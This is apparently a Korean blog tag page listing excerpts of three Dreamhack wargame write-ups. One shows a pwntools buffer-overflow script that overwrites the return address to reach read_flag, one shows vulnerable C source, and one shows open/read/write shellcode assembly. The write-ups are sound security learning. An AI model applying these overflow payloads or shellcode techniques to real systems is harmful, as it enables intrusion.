'wargame' 태그의 글 목록

[System Hacking] basic_exploitation_001

의 주소: 0x80485b9 buffer size: 0x80 Arch: i386-32-little memory layout: ... buf (0x80 byte) SFP (0x4 byte) ret address (0x4 byte) ... payload (should be 0x88 byte): 쓰레기 값 (0x84 byte) read_flag의 주소 (0x4 byte) from pwn import * p = remote("host3.dreamhack.games", 9796) # 쓰레기 값 payload = b"\x41" * 0x84 # 셸코드의 주소 추가 payload += b"\xb9\x85\x04\x08" p.send(payload) p.interactive()

IT/Wargame 2024.03.03

[System Hacking] basic_exploitation_000

Description 프로그램의 취약점을 통해 셸을 획득한 후, "flag" 파일을 읽어야 한다. 공격 대상의 코드 #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } int main(int argc, char *argv[]) { char buf[0x80]; // 128바이트 initialize(); printf("buf = (%p)\n", buf); scanf("%..

IT/Wargame 2024.03.02

[System Hacking] shell_basic: orw를 통해 flag 파일 얻기

1. mycode 어셈블리 작성하기 이 문제에서 orw를 하기 위해서는 아래와 같은 syscall이 필요하다. 1. open("/home/shell_basic/flag_name_is_loooooong", RD_ONLY, NULL) 2. read(fd, buf, 0x30) 3. write(1, buf, 0x30) 따라서 위를 수행하는 어셈블리를 아래와 같이 작성했다. "/home/shell_basic/flag_name_is_loooooong"의 hex를 stack에 push하기 xor rax, rax push rax mov rax, 0x676e6f6f6f6f6f6f push rax mov rax, 0x6c5f73695f656d61 push rax mov rax, 0x6e5f67616c662f63 push ..

IT/Wargame 2024.02.29

ky.agile

wargame 3

티스토리툴바